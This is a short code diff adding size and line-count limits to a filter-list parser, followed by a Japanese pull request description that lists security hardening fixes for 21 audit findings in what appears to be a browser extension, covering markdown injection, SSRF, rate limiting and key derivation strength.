+    const MAX_INPUT_SIZE = 10 * 1024 * 1024; // 10MB
+    if (text.length > MAX_INPUT_SIZE) {
+        return createEmptyRuleset();
+    }
+
     // 【行分割】: 改行区切りのテキストを配列に変換 🟢
     const lines = text.split('\n');
+
+    // VULN-012 fix: limit line count to prevent excessive processing
+    const MAX_LINES = 500000;
+    if (lines.length > MAX_LINES) {
+        return createEmptyRuleset();
+    }
 
     // 【配列初期化】: ルール格納用配列 🟢
     const blockRules: UblockRule[] = [];


### PR DESCRIPTION
## 概要

VulnHunter セキュリティ監査 (2026-07-21) で確認された21件のVULNを、6PBIに分けて修正しました。

## 修正内容

### PBI-01: マークダウン注入の根本修正 (VULN-001,002,004,005)
- `sanitizeForObsidian()` を scheme-agnostic (`sanitizeAllMarkdownLinks`) に切り替え + `escapeObsidianWikilinks` 追加
- `formatMarkdownStep` のURLに `sanitizeUrlForMarkdownTarget` を適用
- `SAVE_RECORD` ハンドラに `isSecureUrl` チェック追加

### PBI-02: マークダウン注入の派生サーフェス修正 (VULN-006,007,020)
- `obsidianFormatter.ts`: URLサニタイズ
- `dashboard.ts`: `formatEntryToMarkdown` にサニタイズ適用
- `sqliteHistoryPanel.ts`: hrefに `isSecureUrl` + `rel="noopener noreferrer"`

### PBI-03: 信頼性ハードニング (VULN-003,008,011,012,014,016)
- `recordingLogic`: URL単位 Mutex で TOCTOU レース防止
- `restore_db`: base64 サイズ上限 (150MB)
- `matchesPattern`: ワイルドカード数上限 (5個)
- `uBlock fetch/parse`: 10MB 上限 + 50万行上限
- `saveSettings`: キャッシュ再汚染防止
- `offscreen`: SQLite 書き込み Mutex 直列化

### PBI-04: 設定インポート署名バイパス + SSRF (VULN-009,010,013)
- `importSettings` / `importEncryptedSettings`: `confirm()` バイパス削除
- `cspValidator` + `fetch`: ループバックポートを host_permissions の4ポートに制限
- IPv4 正規表現を完全アンカー化

### PBI-05: マスターパスワードレート制限統一 (VULN-018,021)
- `unlockWithPassword`: `rateLimiter` 適用
- `authenticatePassword`: `rateLimiter` 適用

### PBI-06: マスターパスワード保護の完全性 (VULN-015,017,019)
- 無効化操作にパスワード認証を必須化
- 暗号化キーキャッシュ返却前に `IS_LOCKED` チェック
- セッションロック通知にリトライ機構
- PBKDF2 反復回数を 100,000 → 600,000 に強化 + 既存ハッシュ移行

## チェック項目

- [x] `npm run type-check` パス
- [x] `npm test` 全テストパス (7256 passed, 18 skipped)
- [x] 既存テストの修正（モック・戻り値型変更に対応）
- [x] 新規テスト追加（markdownSanitizer, obsidianFormatter 等）

## 変更統計

- 37 files changed
- 695 insertions(+)
- 144 deletions(-)

Closes: VULN-001..VULN-021